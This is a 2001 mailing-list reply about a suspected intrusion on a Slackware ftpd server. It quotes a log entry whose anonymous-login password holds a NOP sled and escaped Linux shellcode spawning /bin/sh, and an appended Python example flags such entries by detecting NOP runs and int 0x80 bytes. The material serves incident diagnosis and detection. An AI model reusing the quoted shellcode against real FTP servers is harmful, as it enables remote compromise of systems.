Re: Linux ftpd

From: Sam Mingolelli (samat_private)
Date: Sat Jun 09 2001 - 09:23:56 PDT


    This looks like a buffer overflow attack to me. I would make sure that
    you have the latest patches etc. applied to ftpd. 
    
    You can browse thru the CERT dbs to see if any info has been posted
    regarding this.
    
    http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd
    
    
    * mrcbisat_private <mrcbisat_private> [010609 12:12]:
    
    > 
    > I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as
    > office-server; we have an internet-connection in dial-up to an ISP near us.
    > Today I was looking into log-files, I found, in /var/log/messages the
    > following message:
    > Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM
    > 202.239.131.55 [2
    > 02.239.131.55],
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C
    > 0>1
    > <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C
    > D>
    > <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8
    > D>^^H
    > <B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE
    > ><C8>
    > <88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1
    > <DB>
    > <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11
    > 
    > 
    > repeated twice within a few minutes. I think it was an intrusion attempt. My
    > linux-box is connected to the internet with dynamic-ip-address. Can
    > someone help me ? 
    > Best regards
    > 
    > 
    > 						Marco Bisio
    
    -- 
                      \|/                                                                 
                      @-@                                                                 
    ------------ooO---(_)--Ooo----------------                                            
    | E-Mail:                                                                             
    |        (H):    slmingolat_private                                                
    |        (W):    sam.mingoat_private                                                
    |                                                                                     
    | web:           http://bubs.dnsq.org/~sam/
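
Added example, not part of the original messages: one way to flag entries like the quoted one when reviewing /var/log/messages. It assumes non-printable bytes are written as <XX> hex, as in the quote; the function names, the 16-byte threshold and the sample lines are illustrative assumptions.

```python
import re
from itertools import groupby

# The log shows a non-printable byte as <XX> (hex), as in the quoted entry.
# Caret escapes such as ^A are left as literal text in this sketch.
ESCAPED = re.compile(r"<([0-9A-Fa-f]{2})>")
LOGIN = re.compile(r"ftpd\[(?P<pid>\d+)\]: ANONYMOUS FTP LOGIN FROM "
                   r"\S+ \[(?P<ip>[^\]]+)\], (?P<ident>.*)$")

def decode_ident(text):
    """Turn the escaped ident (password) string back into raw bytes."""
    out, pos = bytearray(), 0
    for m in ESCAPED.finditer(text):
        out += text[pos:m.start()].encode("latin-1", "replace")
        out.append(int(m.group(1), 16))
        pos = m.end()
    return bytes(out + text[pos:].encode("latin-1", "replace"))

def inspect(line, min_sled=16):
    """Return a finding for a suspicious anonymous login, else None."""
    m = LOGIN.search(line)
    if not m:
        return None
    raw = decode_ident(m.group("ident"))
    # Longest run of 0x90, the x86 NOP opcode (a "NOP sled").
    sled = max((sum(1 for _ in g) for b, g in groupby(raw) if b == 0x90),
               default=0)
    int80 = raw.count(b"\xcd\x80")       # int 0x80: Linux i386 system call
    nonprint = sum(b < 0x20 or b > 0x7E for b in raw)
    if sled >= min_sled or int80 or nonprint > len(raw) // 2:
        return {"ip": m.group("ip"), "pid": int(m.group("pid")),
                "ident_len": len(raw), "nop_run": sled,
                "int80": int80, "nonprintable": nonprint}
    return None

# Constructed sample lines; the second is a shortened stand-in for the
# entry quoted in the post, the first a normal anonymous login.
SAMPLE = [
    "Jun  3 21:12:44 sassuolo ftpd[24101]: ANONYMOUS FTP LOGIN FROM "
    "192.0.2.10 [192.0.2.10], mozilla@",
    "Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM "
    "202.239.131.55 [202.239.131.55], " + "<90>" * 40 + "1<C0>1<DB><B0>F<CD><80>",
]

def scan(lines):
    return [f for f in map(inspect, lines) if f]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A hit only shows that someone sent binary data as the anonymous password; whether it had any effect depends on the ftpd version and patch level running at the time.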
    


